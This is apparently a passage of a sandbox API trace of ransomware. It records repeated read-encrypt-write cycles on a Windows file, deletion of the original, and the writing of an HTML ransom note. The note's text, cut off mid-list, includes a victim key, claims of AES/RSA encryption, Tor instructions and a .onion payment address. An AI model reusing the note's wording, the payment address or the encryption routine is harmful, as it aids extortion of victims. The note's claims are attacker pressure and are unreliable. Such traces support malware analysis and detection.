lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.548] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.549] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.549] GetLastError () returned 0x0 [0154.549] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.549] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.549] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.549] GetLastError () returned 0x0 [0154.549] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.549] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.549] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.549] GetLastError () returned 0x0 [0154.549] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.549] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.549] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.549] GetLastError () returned 0x0 [0154.549] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.549] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.549] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.549] GetLastError () returned 0x0 [0154.549] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.549] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.549] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.549] GetLastError () returned 0x0 [0154.549] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.549] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.550] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.550] GetLastError () returned 0x0 [0154.550] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.550] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.550] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.550] GetLastError () returned 0x0 [0154.550] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.550] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.550] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.550] GetLastError () returned 0x0 [0154.550] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.550] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.550] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.550] GetLastError () returned 0x0 [0154.550] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.550] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.550] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.550] GetLastError () returned 0x0 [0154.550] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.550] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.550] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.550] GetLastError () returned 0x0 [0154.550] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.550] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.551] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.551] GetLastError () returned 0x0 [0154.551] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.551] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.551] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.551] GetLastError () returned 0x0 [0154.551] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.551] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.551] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.551] GetLastError () returned 0x0 [0154.551] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.551] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.551] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.551] GetLastError () returned 0x0 [0154.551] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.551] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.551] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.551] GetLastError () returned 0x0 [0154.551] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.551] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.551] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.551] GetLastError () returned 0x0 [0154.551] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.551] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.551] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.551] GetLastError () returned 0x0 [0154.551] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.552] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.552] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.552] GetLastError () returned 0x0 [0154.552] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.552] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.552] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.552] GetLastError () returned 0x0 [0154.552] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.552] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.552] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.552] GetLastError () returned 0x0 [0154.552] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.552] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.552] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.552] GetLastError () returned 0x0 [0154.552] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.552] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.552] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.552] GetLastError () returned 0x0 [0154.552] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.552] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.552] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.552] GetLastError () returned 0x0 [0154.552] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.553] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.553] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0154.553] GetLastError () returned 0x0 [0154.553] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0154.553] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0154.553] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0154.553] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\tipresx.dll.mui")) returned 0x20 [0154.553] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0154.553] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\tipresx.dll.mui") returned 1 [0154.553] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\tipresx.dll.mui")) returned 0 [0154.554] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\tipresx.dll.mui" [0154.554] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE") returned 1 [0154.554] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\.xXCED7.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\.xxced7.tmp")) returned 0xced7 [0154.554] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\.xXCED7.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\.xxced7.tmp"), dwFlags=0x1) returned 0 [0154.554] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\.xXCED7.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\.xxced7.tmp")) returned 1 [0154.555] CryptDestroyKey (hKey=0x9ad738) returned 1 [0154.555] wcslen (_String="OK") returned 0x2 [0154.555] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0154.555] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0154.555] CryptDestroyKey (hKey=0x9ad5f8) returned 1 [0154.555] CryptDestroyHash (hHash=0x9ad338) returned 1 [0154.555] CryptReleaseContext (hProv=0x8e3a18, dwFlags=0x0) returned 1 [0154.555] FindNextFileW (in: hFindFile=0x9ad8b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0154.555] GetLastError () returned 0x12 [0154.555] FindClose (in: hFindFile=0x9ad8b8 | out: hFindFile=0x9ad8b8) returned 1 [0154.555] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0154.555] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
